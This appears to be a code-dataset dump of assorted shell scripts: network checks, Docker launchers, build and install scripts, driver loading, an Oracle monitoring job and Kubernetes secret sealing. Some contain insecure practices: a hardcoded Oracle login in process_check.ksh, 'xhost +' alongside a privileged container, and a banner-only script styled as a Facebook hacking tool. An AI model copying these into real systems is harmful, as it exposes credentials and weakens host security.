blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
33f7f8132de1692d326ad18e333ae0028ed70544
|
Shell
|
m23project/m23
|
/m23/bin/networkCheckSetDialog
|
UTF-8
| 1,932
| 4.3125
| 4
|
[] |
no_license
|
#!/bin/bash
# Checks network settings and asks for correct values for the override files
#name checkIPAskForAlternative
#description Checks, if an FQDN, IP or netmask is valid and asks the administrator for a valid
#parameter: $1 text
#parameter: name of the override file
#parameter: true, if FQDN is allowed, otherwise false.
checkIPAskForAlternative()
{
backtitle='m23 network configuration for m23 clients'
title="$1"
text="Invalid configuration found! Please enter a valid value.
Hint: This tool does not change the network configuration ON the m23 server.
Here you set network settings for m23 clients.
Ungueltige Konfiguration gefunden! Bitte geben Sie eine gueltigen Wert ein.
Hinweise: Hiermit aendern Sie NICHT die Netzwerkkonfiguration des m23-Servers,
sondern die der m23-Clients."
confFile="$2"
allowFQDN="$3"
export retCode=1
while [ $retCode -ne 0 ]
do
echo "dialog --backtitle `echo \"'$backtitle'\"` --title `echo \"'$title'\"` --clear --inputbox `echo \"'$text'\"` 20 75 \"\" 2> /tmp/dialog.value; exit \$?" > /tmp/dialog.cmd
bash /tmp/dialog.cmd
RET="$(cat /tmp/dialog.value)"
/m23/bin/checkIP "$RET" || ( /m23/bin/checkFQDN "$RET" && $allowFQDN )
export retCode=$?
echo -n "$RET" > "$confFile"
done
}
/m23/bin/checkIP "`/m23/bin/serverInfoDNS`"
if [ $? -ne 0 ]
then
checkIPAskForAlternative "DNS server/DNS-Server" "/m23/etc/dns.override" false
fi
IP="`/m23/bin/serverInfoIP`"
/m23/bin/checkIP "$IP" || /m23/bin/checkFQDN "$IP"
if [ $? -ne 0 ]
then
checkIPAskForAlternative "IP address/IP-Adresse" "/m23/etc/address.override" true
fi
/m23/bin/checkIP "`/m23/bin/serverInfoGateway`"
if [ $? -ne 0 ]
then
checkIPAskForAlternative "Gateway server/Gateway-Server" "/m23/etc/gateway.override" false
fi
/m23/bin/checkIP "`/m23/bin/serverInfoBroadcast`"
if [ $? -ne 0 ]
then
checkIPAskForAlternative "Broadcast address/Broadcast-Adresse" "/m23/etc/broadcast.override" false
fi
| true
|
1f303a8501b55537d65c46cc94eb0b84b2075274
|
Shell
|
ghsecuritylab/trabajo-final-cese-robot
|
/docker/run_docker.sh
|
UTF-8
| 761
| 2.578125
| 3
|
[] |
no_license
|
SCRIPTS_DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
REPO_DIR=`readlink -f ${SCRIPTS_DIR}/..`
DOCKER_CAPABILITIES="--ipc=host \
--cap-add=IPC_LOCK \
--cap-add=sys_nice"
DOCKER_NETWORK="--network=host"
DOCKER_MOUNT_ARGS="\
-v /tmp/.X11-unix:/tmp/.X11-unix:rw \
-v ${REPO_DIR}:/catkin_ws/src/tesis-bot"
DOCKER_GRAPHICS_FLAG="--device /dev/dri"
xhost +
docker run --privileged --rm \
${DOCKER_CAPABILITIES} \
${DOCKER_MOUNT_ARGS} \
-v /etc/fstab:/etc/fstab:ro \
-e ROS_HOSTNAME=localhost \
-e ROS_MASTER_URI=http://localhost:11311 \
${DOCKER_GRAPHICS_FLAG} \
${DOCKER_NETWORK} \
-e DISPLAY=${DISPLAY} \
-it ros-kinetic-dev
xhost -
| true
|
5761edc6c68670f6174cec5d7baa2312e2f7c733
|
Shell
|
elastest/elastest-torm
|
/docker/services/testlink/app-entrypoint.sh
|
UTF-8
| 322
| 2.75
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash -e
. /opt/bitnami/base/functions
. /opt/bitnami/base/helpers
print_welcome_page
check_for_updates &
if [[ "$1" == "nami" && "$2" == "start" ]] || [[ "$1" == "/init.sh" ]]; then
nami_initialize apache php testlink
info "Starting testlink... "
fi
rm -rf /opt/bitnami/testlink/install/
exec tini -- "$@"
| true
|
79bafe6794bf1183757763ffb2dcf41f397f6fc4
|
Shell
|
OpenDataAnalytics/kitware-geospatial-recipes
|
/recipes/texture-atlas/build.sh
|
UTF-8
| 522
| 2.953125
| 3
|
[] |
permissive
|
#!/bin/bash
mkdir build
cd build
BUILD_CONFIG=Release
if [ $(uname) == Darwin ]; then
export CXXFLAGS="${CXXFLAGS} -stdlib=libc++"
export LDFLAGS="${LDFLAGS} -headerpad_max_install_names"
fi
cmake ../Texture_Atlas/src/ -G "Ninja" \
-Wno-dev \
-DCMAKE_BUILD_TYPE=$BUILD_CONFIG \
-DCMAKE_PREFIX_PATH:PATH="${PREFIX}" \
-DCMAKE_INSTALL_PREFIX:PATH="${PREFIX}" \
-DCMAKE_INSTALL_RPATH:PATH="${PREFIX}/lib" \
-DCMAKE_OSX_DEPLOYMENT_TARGET:STRING="10.9"
# compile & install!
ninja install
| true
|
33f2403199907f61250dffaef464d0d2b2ad3be3
|
Shell
|
AMIS-Services/code-cafe-20190520
|
/laptop-as-code/dotfiles/bin/resource_usage.sh
|
UTF-8
| 879
| 3.703125
| 4
|
[] |
no_license
|
#!/bin/sh
OS=`uname`
BIN_TOP=/bin/top
if [ -x ${BIN_TOP} ]; then
echo "CPU Usage:"
${BIN_TOP} -b -n 1
fi
BIN_PS=/bin/ps
if [ -x ${BIN_PS} ]; then
echo "Top Memory Usage:"
${BIN_PS} aux | sort -r -nk 4 | head
fi
VMSTAT=/usr/bin/vmstat
if [ -x ${VMSTAT} ]; then
echo ""
echo "Virtual Memory Info:"
if [ "${OS}" = "FreeBSD" ]; then
${VMSTAT} 1 3
else
HAS_TIMESTAMP=`${VMSTAT} --help 2>&1 | grep -c '\-t'`
if [ "${HAS_TIMESTAMP}" = "0" ]; then
date
${VMSTAT} -w 1 3
date
else
${VMSTAT} -tw 1 3
fi
fi
fi
NETSTAT=/usr/bin/netstat
if [ -x ${NETSTAT} ]; then
echo ""
echo "Network Info:"
${NETSTAT} -anlp
fi
| true
|
6603cd7e19a37ab8acff37a649818423491f42ea
|
Shell
|
BadderZman/Fbnewtool2020
|
/fbtool.sh
|
UTF-8
| 1,452
| 2.890625
| 3
|
[] |
no_license
|
clear
echo
echo
python .password.py
echo
echo
clear
echo -e "\e[4;31m Kareem Musa !!! \e[0m"
echo -e "\e[1;34m Presents \e[0m"
echo -e "\e[1;32m FB TOOL \e[0m"
echo "Press Enter To Continue"
read a1
clear
echo -e "\e[1;31m"
figlet FB TOOL
echo -e "\e[1;34m Created By \e[1;32m"
toilet -f mono12 -F border B.C.M
echo -e "\e[4;34m This TOOL Was Created By Kareem Musa \e[0m"
echo -e "\e[1;34m For Any Queries Mail Me!!!\e[0m"
echo -e "\e[1;32m Mail: legends.and.criminals@gmail.com \e[0m"
echo -e "\e[4;32m FB Page: https://www.facebook.com/c/kareeemMusa \e[0m"
echo " "
echo -e "\e[4;31m Please Read Instruction Carefully !!! \e[0m"
echo " "
echo "------------------ "
echo "|Press 1| MENU| "
echo "|----------------| "
echo "|Press 2| Exit| "
echo "------------------ "
echo
echo
echo
echo
read ch
if [ $ch -eq 1 ];then
clear
echo -e "\e[1;32m"
bash .help.sh
exit 0
elif [ $ch -eq 2 ];then
clear
echo -e "\e[1;31m"
figlet FB TOOL
echo -e "\e[1;34m Created By \e[1;32m"
toilet -f mono12 -F border B.C.M
echo -e "\e[1;34m For Any Queries Mail Me!!!\e[0m"
echo -e "\e[1;32m Mail: legends.and.criminals@gmail.com \e[0m"
echo -e "\e[1;32m Facebook: https://m.facebook.com/KareeemMusa \e[0m"
echo -e "\e[4;32m Special Thanks To KareemMusa \e[0m"
echo " "
exit 0
else
echo -e "\e[4;32m Invalid Input !!! \e[0m"
toilet -f mono12 -F border KAREEM
toilet -f mono12 -F border +
toilet -f mono12 -F border MUSA
echo "Press Enter To Go Home"
read a3
clear
cd ..
cd home
fi
done
| true
|
2313d94708835038554477bdc71da41ab46eab98
|
Shell
|
akuru/UbuntuSinhalaFont
|
/install.sh
|
UTF-8
| 774
| 3.453125
| 3
|
[] |
no_license
|
#!/bin/bash
# Install Noto Fonts
sudo apt install -y fonts-noto fontconfig
# Download font config
if [ ! -f 65-nonlatin.conf ]; then
echo "Downloading font config"
wget https://raw.githubusercontent.com/IMS94/UbuntuSinhalaFont/master/65-nonlatin.conf
fi
# Move existing non-latin config
if [ ! -f /etc/fonts/conf.avail/65-nonlatin.conf.bak ]; then
echo "Backing up existing configuration"
sudo mv /etc/fonts/conf.avail/65-nonlatin.conf /etc/fonts/conf.avail/65-nonlatin.conf.bak
fi
# Move downloaded config to font configs
echo "Updating font config"
sudo mv 65-nonlatin.conf /etc/fonts/conf.avail/65-nonlatin.conf
# Reload font cache
echo "Reloading font cache"
fc-cache -r
echo "All Done! Please restart your machine for updated fonts to take effect"
| true
|
2a5f75f40dc00bae4801c19bd41f611d5bfd5b67
|
Shell
|
igormalyk/dotfiles
|
/install.sh
|
UTF-8
| 1,062
| 4
| 4
|
[] |
no_license
|
#!/bin/bash
echo "### Starting .dotfiles setup"
if [ -e ~/.dotfiles ]
then
echo "### ERROR: Already bootstrapped dotfiles."
exit 0
fi
if [ -d ~/.dotfiles_backup ]
then
echo "OK: Backup directory exists."
else
echo "OK: Creating ~/.dotfiles_backup directory."
mkdir ~/.dotfiles_backup
fi
echo "# Looking home dir for existing dotfiles with the same name"
for file in `find _* -type f | cut -d _ -f 2` ;
do
if [ -e ~/."$file" ]
then
echo "OK: Found .$file"
mv ~/."$file" ~/.dotfiles_backup/
echo "OK: Backed up .$file"
ln -s $PWD/_"$file" ~/."$file"
echo "OK: Symlinked .$file"
else
ln -s $PWD/_"$file" ~/."$file"
echo "OK: Symlinked new .$file"
fi
done
echo "# Backed up dotfiles (if any) will be located in ~/.dotfiles_backup"
touch ~/.dotfiles
echo "OK: Created a flag file."
if [ -e ~/.bash_profile ]
then
echo "OK: Reloading .bash_profile"
source ~/.bash_profile
else
echo "OK: Reloading .bashrc"
source ~/.bashrc
fi
echo "### Setup complete"
| true
|
fd5eb1e67cfadd40687b083a0d71e42dff0c8735
|
Shell
|
wilson-tim/stellahomedw
|
/DWLIVE/jutil/process_check/process_check.ksh
|
UTF-8
| 3,059
| 3.59375
| 4
|
[] |
no_license
|
#!/usr/bin/ksh
#set -x
# *******************************************************************
# * PROCESS CHECKING ROUTINE *
# *******************************************************************
# * *
# * This shell script is called with three parameters, *
# * Parameter 1 - Time in seconds between each loop *
# * Parameter 2 - Number of times round loop *
# * Parameter 3 - User name used in process call *
# * *
# * Example Call *
# * process_check.ksh 900 20 dw *
# * This will perform the checks, wait for 900 seconds (15 minutes) *
# * and run for a total of 5 hours (15 minutes * 20), it will check *
# * the processes running against user dw *
# * *
# *******************************************************************
. /home/dw/bin/set_oracle_variables.ksh
# *******************************************************************
# * DECLARE VARIABLES *
# *******************************************************************
sleep_time=$1
num_loops=$2
username=$3
app_dir=/home/dw/DWLIVE/process_check
log_dir=/home/dw/DWLIVE/logs/process_check
# *******************************************************************
# * PROGRAM START *
# *******************************************************************
# Get Date Information from Oracle
sqlplus -s dw/dbp<<Rob_S|read a b
set pagesize 0
set echo off
set heading off
set feedback off
set verify off
select
to_char(sysdate,'Dy'),
to_char(trunc(sysdate),'yyyymondd')
from dual;
exit
Rob_S
export day_stamp=${a}
export date_stamp=${b}
Create empty log files
process_file=${log_dir}/process_check.${day_stamp}_${date_stamp}
session_file=${log_dir}/session_check.${day_stamp}_${date_stamp}
>${process_file}
>${session_file}
#Beginning 19:30 loop at 15 minute intervals until 00:30
(( k=0 ))
while [[ k -le ${num_loops} ]]
do
sqlplus -s dw/dbp<<Rob_S2|read a
set pagesize 0
set echo off
set heading off
set feedback off
set verify off
select
to_char(sysdate,'hh24:mi:ss')
from dual;
exit
Rob_S2
export time_stamp=${a}
echo k=${k} Time=${time_stamp}>>${process_file}
ps -fu${username}|sort -k5|grep -v sort|grep -v "sleep"|grep -v "ps -fudw"|grep -v process_check>>${process_file}
echo "__/\__/\__/\__">>${process_file}
echo " ">>${process_file}
echo k=${k} Time=${time_stamp}>>${session_file}
sessions>>${session_file}
echo "__/\__/\__/\__">>${session_file}
echo " ">>${session_file}
(( k = k+1 ))
sleep ${sleep_time}
done
cd ${log_dir}
for delfiles in `find ${log_dir} -name "*" -mtime +30`
do
rm ${delfiles}
done
| true
|
f7cea5049dc5df321eeae6f8257215ecc6eece11
|
Shell
|
michelleirvine/bazel-toolchains
|
/container/debian8-clang-fully-loaded/build.sh
|
UTF-8
| 2,663
| 3.78125
| 4
|
[
"Apache-2.0"
] |
permissive
|
# Copyright 2017 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/env bash
set -e
show_usage () {
usage=$(cat << EOF
Usage: build.sh [options]
Builds the fully-loaded container using Google Cloud Container Builder.
Required options:
-p|--project GCP project ID
-c|--container docker container name
-t|--tag docker tag for the image
Optional options:
-a|--async asynchronous execute Cloud Container Builder
For example, running:
$ build.sh -p my-gcp-project -c debian8-clang-fully-loaded -t latest
will produce docker images:
gcr.io/my-gcp-project/debian8-clang-fully-loaded:latest
EOF
)
echo "$usage"
}
parse_parameters () {
while [[ $# -gt 0 ]]; do
case "$1" in
-h|--help)
show_usage
exit 0
;;
-p|--project)
shift
PROJECT=$1
shift
;;
-c|--container)
shift
CONTAINER=$1
shift
;;
-t|--docker-tag)
shift
TAG=$1
shift
;;
-a|--async)
ASYNC=" --async "
shift
;;
*)
echo "Unknown argument $1"
show_usage
exit 1
;;
esac
done
if [[ "$PROJECT" == "" || "$CONTAINER" == "" || "$TAG" == "" ]]; then
echo "Please specify all required options"
show_usage
exit 1
fi
}
main () {
parse_parameters $@
# Setup GCP project id for the build
gcloud config set project ${PROJECT}
PROJECT_ROOT=$(git rev-parse --show-toplevel)
DIR="container/debian8-clang-fully-loaded"
# We need to start the build from the root of the project, so that we can
# mount the full root directory (to use bazel builder properly).
cd ${PROJECT_ROOT}
# We need to run clean to make sure we don't mount local build outputs
bazel clean --async
# Start Google Cloud Container Builder
gcloud container builds submit . \
--config=${PROJECT_ROOT}/container/debian8-clang-fully-loaded/cloudbuild.yaml \
--substitutions _PROJECT=${PROJECT},_CONTAINER=${CONTAINER},_TAG=${TAG},_DIR=${DIR} \
${ASYNC}
}
main $@
| true
|
419435546ef9720744fcb27b43685b599a779c93
|
Shell
|
lucas101199/MapMaking
|
/mapper.sh
|
UTF-8
| 748
| 3.625
| 4
|
[] |
no_license
|
#!/bin/bash
# Example script for calling mapper. Don't forget to make it executable (chmod +x mapper)
# Change the last line (java Mapper ...) to suit your needs
# Author: Ola Ringdahl
#
# Inputs:
# url specifies the address and port to the machine running MRDS.
# x1, y1, x2, y2 give the coordinates of the lower left and upper right corners of the area the robot should explore and map.
# showGUI: 1 should show the map, 0 should not
if [ "$#" -ne 6 ]; then
echo "Usage: ./mapper url x1 y1 x2 y2 showGUI"
exit
fi
url="$1"
x1="$2"
y1="$3"
x2="$4"
y2="$5"
showGUI="$6"
# Compile the code (-cp .:/lib/* includes the Jackson .jar files)
javac -cp .:lib/* *.java
# Run the program
java -cp .:./lib/* Mapper $url $x1 $y1 $x2 $y2 $showGUI
| true
|
15b0b741599694ca35b9bc01bc5dc0231faf71a2
|
Shell
|
corpusops/fix_gitlab_runner
|
/roles/fix_gitlabrunner_perms/templates/root/fix_ci_docker_perms.sh
|
UTF-8
| 1,081
| 3.515625
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# add to [[runner]]
# pre_clone_script = "umask 0022"
# then cleanup runner caches & volumes
DRYRUN=${DRYRUN-}
VOLUMEPATTERN="${VOLUMEPATTERN:-gitlab.*runner}"
JQ="jq -M"
vv() {
echo "$@">&2
"$@"
}
drvv() {
echo "$@">&2
if [[ -z $DRYRUN ]];then
"$@"
fi
}
RUNNER_CACHE_CONTAINERS=$( docker ps -a | egrep "runner.*cache" | awk '{print $1}'; )
RUNNER_VOLUMES=""
# clean docker cache containers
for i in $RUNNER_CACHE_CONTAINERS;do
infos="$(docker inspect $i)"
if ( echo "$infos" | $JQ .[0].Mounts | egrep -q "$VOLUMEPATTERN" );then
declare -a mounts="$( echo "$infos" | $JQ .[0].Mounts )"
for m in "${mounts[@]}";do
if ( echo "$m" | $JQ .[0].Destination | egrep -q "$VOLUMEPATTERN" );then
RUNNER_VOLUMES="$RUNNER_VOLUMES $( echo "$m" | $JQ .[0].Name -r)"
fi
done
fi
done
# clean docker volumes
for i in $RUNNER_CACHE_CONTAINERS;do
drvv docker rm -f $i
done
for i in $RUNNER_VOLUMES;do
drvv docker volume rm -f $i
done
# vim:set et sts=4 ts=4 tw=80:
| true
|
7cf5a8c20c4b5837beb7c01e8871644721e28ccf
|
Shell
|
alex-suess/dotfiles
|
/yarn/install.sh
|
UTF-8
| 170
| 3.21875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
#
# This installs yarn via homebrew
read -p "Do you wish to install yarn? [y/n]" yn
case "$yn" in
Y|y )
brew update
brew install yarn
esac
| true
|
2a1de4a9457cee975ecca392f8c196599c6d3f2b
|
Shell
|
ntujvang/holbertonschool-sysadmin_devops
|
/0x09-web_server/4-not_found_page_404
|
UTF-8
| 412
| 3
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Script that redirects to 404
sudo apt-get install -y nginx
echo "Ceci n'est pas une page" | sudo tee /usr/share/nginx/html/custom_404.html
string="error_page 404 /custom_404.html;\\n location = /custom_404.html {\\n root /usr/share/nginx/html;\\n internal;\\n}"
mine="#error_page 404 /404.html;"
loc="/etc/nginx/sites-enabled/default"
sudo sed -i "26i $string" $loc
sudo service nginx start
| true
|
58d1ca6ceb0e07dd2e7a47a0bb24700ccdcb45e5
|
Shell
|
Mattlk13/maglev
|
/lib/ruby/1.9/openssl/ext/missing.sh
|
UTF-8
| 258
| 2.96875
| 3
|
[] |
no_license
|
#!/bin/sh
for i in `grep '#if !defined(HAVE_' openssl_missing.c | sed -e 's/\#if\ \!defined(HAVE_//' -e 's/).*//' `
do
if nm ../../../../../gemstone/lib/libssl*.dylib | grep -qi "$i"
then
echo Has $i;
else
echo Doesnt have $i;
fi
done
| true
|
ff8c6d6d01c3af592ad0d5139436d86e840cb002
|
Shell
|
joseflorida/sistemas
|
/script1.sh
|
UTF-8
| 177
| 3.34375
| 3
|
[] |
no_license
|
x=$1
y=$2
if [ $x -gt $y ]; then
echo "El mayor es:$x"
else if [ $y -gt $x ]; then
echo "El mayor es:$y"
else if [ $x -eq $y ]; then
echo "Son iguales"
fi
fi
fi
| true
|
bab1e8dad0a37d196c6f65fba06386be3baf64fc
|
Shell
|
LeandroGuillen/sta
|
/escenario/SNMP/SNMP-Configure.sh
|
UTF-8
| 1,537
| 3.71875
| 4
|
[] |
no_license
|
#!/bin/bash
user=`whoami`
directory=`pwd`
if [ "$user" != "root" ]; then
echo "$user is not an administrator"
exit 1
fi
cd $HOME
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/lib
echo -n '¿Agente (snmpd) o manejador (trapd)? (a/m): '
read var1
if [ "$var1" == "a" ]; then
echo -n "Ip del manejador para enviar traps: "
read ipManejador
echo "$ipManejador manejador.com" >> /etc/hosts
cp $directory/snmpd.conf .
# Crear jerarquia de directorios par a las claves y certificados
# /usr/local/shared/snmpd/tls
cp -r $directory/tlsagente/tls /usr/local/share/snmp
# Cambiar los permisos a agente.key y agente.crt
chmod 600 /usr/local/share/snmp/tls/private/agente.key
chmod 600 /usr/local/share/snmp/tls/certs/agente.crt
snmpd -r -u alumno -f -Leo -c $HOME/snmpd.conf udp:161 tlstcp:10161 dtlsudp:10161
else # Configurar el manejador
# Si no existe el directorio (no estamos en el mismo agente)
if [ ! -d "/usr/local/share/snmp/tls" ]; then
cp -r $directory/tlsmanejador/tls /usr/local/share/snmp
else
# Copiar solo las claves
cp $directory/tlsmanejador/tls/private/manejador.key /usr/local/share/snmp/tls/private
fi
# Cambiar los permisos a agente.key y agente.crt
chmod 600 /usr/local/share/snmp/tls/private/manejador.key
chmod 600 /usr/local/share/snmp/tls/certs/manejador.crt
cp $directory/snmptrapd.conf .
echo -n "Ip del agente ( x.x.x.x agente.com en hosts): "
read ipAgente
echo "$ipAgente agente.com" >> /etc/hosts
snmptrapd -f -Leo -c snmptrapd.conf
fi
| true
|
9967b192161d8233a8f889dcd21123294c328b4e
|
Shell
|
kva-devops/bash_scripts
|
/pull-messagese.sh
|
UTF-8
| 838
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/bash
# Author: Kutiavin Vladimir
# Date: 11/02/21
# Description: Scan logs file and find line what you need
sudo cp /var/log/messages .
sudo chown vagrant:vagrant messages
while true
do
echo What messages you want pull?
echo
echo Press 1 for pull error messages
echo Press 2 for pull warn messages
echo Press 3 for pull fail messages
echo Press 0 for pull error, warn and fail messages
echo Press f for create files with error, warn and fail messages
echo Press q for exit
echo
read result
case $result in
1) grep -i error messages;;
2) grep -i warn messages;;
3) grep -i fail messages;;
0) grep -i -e error -e warn -e fail messages;;
f) grep -i -e error -e warn -e fail messages > errorWarnFailMessages.txt
echo File create;;
q|Q|exit) exit 0;;
*) echo "Invalid choises"
esac
done
grep -i error messages
| true
|
2f55ea659ba758a97f289962eaf08e12f5ce722a
|
Shell
|
GaryniL/AQC111_DSM
|
/enableAQC111.sh
|
UTF-8
| 2,254
| 3.8125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#title :enableAQC111.sh
#description :This script will make aqc111 driver enable in DSM 6.2.
#author :garynil.tw
#date :20200608
#version :0.1
#usage :bash enableAQC111.sh
#==============================================================================
while getopts p:a: flag
do
case "${flag}" in
a) action=${OPTARG};;
p) path=${OPTARG};;
d) driver=${OPTARG};;
esac
done
SYNOPKG_PKGDEST=$path
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
[ -z "$path" ] && SYNOPKG_PKGDEST=$DIR
ACTION=$action
[ -z "$action" ] && ACTION="up"
driver_name=$driver
[ -z "$driver" ] && driver_name="aqc111"
echo "Action: $ACTION";
echo "Path: $SYNOPKG_PKGDEST";
modArray=( aqc111 usbnet mii )
for i in "${modArray[@]}"
do
echo "detecting.. ".$i.ko
if [ ! -z "$(lsmod | grep $i)" ]
then
echo "removed ".$i.ko
/sbin/rmmod $SYNOPKG_PKGDEST/$i.ko
fi
done
sleep 2;
/sbin/insmod $SYNOPKG_PKGDEST/mii.ko
/sbin/insmod $SYNOPKG_PKGDEST/usbnet.ko
/sbin/insmod $SYNOPKG_PKGDEST/aqc111.ko
# Check if aqc111 is enable in mod
check_aqc111=`/sbin/lsmod | grep $driver_name`
if [ -z "$check_aqc111" ]
then
exit 0;
else
echo -z "$check_aqc111";
fi
for interface_name in $(ls /sys/class/net)
do
if [[ ! $interface_name =~ ^eth ]]
then
continue
fi
driver_location=$(ls -ld /sys/class/net/$interface_name/device/driver)
interface_has_aqc111_driver=false
if [ ! -z "$(echo "$driver_location" | grep $driver_name)" ]
then
interface_has_aqc111_driver=true
fi
echo "interface_has_aqc111_driver is "$interface_has_aqc111_driver
if [ $interface_has_aqc111_driver = true ]
then
config_file=/etc/sysconfig/network-scripts/ifcfg-$interface_name
config_storage_location=$SYNOPKG_PKGDEST/ifcfg-$interface_name
if [ -f "$config_file" ] && [ "$ACTION" = "down" ]
then
cp $config_file $config_storage_location
elif [ "$ACTION" = "up" ] && [ -f "$config_storage_location" ]
then
cp $config_storage_location $config_file
fi
echo $interface_name" is "$ACTION" by ifconfig"
ifconfig $interface_name $ACTION
fi
done
| true
|
5f9866c1dd0dfebbb6f5a588be9301b84fa35a40
|
Shell
|
nemisphere/k8s-cluster
|
/secrets/secrets.sh
|
UTF-8
| 7,060
| 3.546875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
export REPO_ROOT
REPO_ROOT=$(git rev-parse --show-toplevel)
need() {
which "$1" &>/dev/null || die "Binary '$1' is missing but required"
}
need "kubeseal"
need "kubectl"
need "sed"
need "envsubst"
if [ "$(uname)" == "Darwin" ]; then
set -a
. "${REPO_ROOT}/secrets/.secrets.env"
set +a
else
. "${REPO_ROOT}/secrets/.secrets.env"
fi
PUB_CERT="${REPO_ROOT}/secrets/pub-cert.pem"
# Helper function to generate secrets
kseal() {
echo "------------------------------------"
# Get the path and basename of the txt file
# e.g. "deployments/default/pihole/pihole-helm-values"
secret="$(dirname "$@")/$(basename -s .txt "$@")"
echo "Secret: ${secret}"
# Get the filename without extension
# e.g. "pihole-helm-values"
secret_name=$(basename "${secret}")
echo "Secret Name: ${secret_name}"
# Extract the Kubernetes namespace from the secret path
# e.g. default
namespace="$(echo "${secret}" | awk -F /cluster/ '{ print $2; }' | awk -F / '{ print $1; }')"
echo "Namespace: ${namespace}"
# Create secret and put it in the applications deployment folder
# e.g. "deployments/default/pihole/pihole-helm-values.yaml"
envsubst < "$@" | tee values.yaml \
| \
kubectl -n "${namespace}" create secret generic "${secret_name}" \
--from-file=values.yaml --dry-run -o json \
| \
kubeseal --format=yaml --cert="$PUB_CERT" \
> "${secret}.yaml"
# Clean up temp file
rm values.yaml
}
#
# Objects
#
# HASS External
#envsubst < "${REPO_ROOT}/cluster/kube-system/nginx/nginx-external/external_ha.txt" | kubectl apply -f -
#
# Helm Secrets
#
# kseal "${REPO_ROOT}/cluster/default/minio/minio-helm-values.txt"
kseal "${REPO_ROOT}/cluster/default/nzbget/nzbget-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/nzbhydra/nzbhydra-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/bitwarden/bitwarden-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/bazarr/bazarr-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/dashmachine/dashmachine-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/unifi/unifi-helm-values.txt"
kseal "${REPO_ROOT}/cluster/default/ombi/ombi-helm-values.txt"
kseal "${REPO_ROOT}/cluster/default/tautulli/tautulli-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/jackett/jackett-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/radarr/radarr-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/sonarr/sonarr-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/qbittorrent/qbittorrent-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/plex/plex-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/bookstack/bookstack-mariadb-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/bookstack/bookstack-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/grocy/grocy-helm-values.txt"
kseal "${REPO_ROOT}/cluster/monitoring/prometheus-operator/prometheus-operator-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/kube-system/keycloak/keycloak-helm-values.txt"
#
# Generic Secrets
#
# Vault Auto Unlock - kube-system namespace
# kubectl create secret generic kms-vault \
# --from-literal=config.hcl="$(envsubst < "$REPO_ROOT"/cluster/kube-system/vault/kms-config.txt)" \
# --namespace kube-system --dry-run -o json \
# | \
# kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/cluster/kube-system/vault/vault-kms-config.yaml
# AzureDNS - cert-manager namespace
kubectl create secret generic azuredns-config \
--from-literal=client-secret="$AZURE_CERTBOT_CLIENT_SECRET" \
--namespace cert-manager --dry-run -o json \
| \
kubeseal --format=yaml --cert="$PUB_CERT" \
> "$REPO_ROOT"/cluster/cert-manager/azuredns/azuredns-config.yaml
# # Restic Password for Stash - default namespace
# kubectl create secret generic restic-backup-credentials \
# --from-literal=RESTIC_PASSWORD=$RESTIC_PASSWORD \
# --from-literal=AWS_ACCESS_KEY_ID=$MINIO_ACCESS_KEY \
# --from-literal=AWS_SECRET_ACCESS_KEY=$MINIO_SECRET_KEY \
# --namespace default --dry-run -o json \
# | \
# kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/cluster/stash/stash/restic-backup-credentials.yaml
# # Keycloak Realm - kube-system namespace
# kubectl create secret generic keycloak-realm \
# --from-literal=realm.json="$(envsubst < "$REPO_ROOT"/cluster/kube-system/keycloak/keycloak-realm.txt)" \
# --namespace kube-system --dry-run -o json \
# | \
# kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/cluster/kube-system/keycloak/keycloak-realm.yaml
# NginX Basic Auth - default namespace
#kubectl create secret generic nginx-basic-auth \
# --from-literal=auth="$NGINX_BASIC_AUTH" \
# --namespace default --dry-run -o json \
# | \
#kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/deployments/kube-system/nginx-ingress/basic-auth-default.yaml
# NginX Basic Auth - kube-system namespace
#kubectl create secret generic nginx-basic-auth \
# --from-literal=auth="$NGINX_BASIC_AUTH" \
# --namespace kube-system --dry-run -o json \
# | \
#kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/deployments/kube-system/nginx-ingress/basic-auth-kube-system.yaml
# NginX Basic Auth - monitoring namespace
#kubectl create secret generic nginx-basic-auth \
# --from-literal=auth="$NGINX_BASIC_AUTH" \
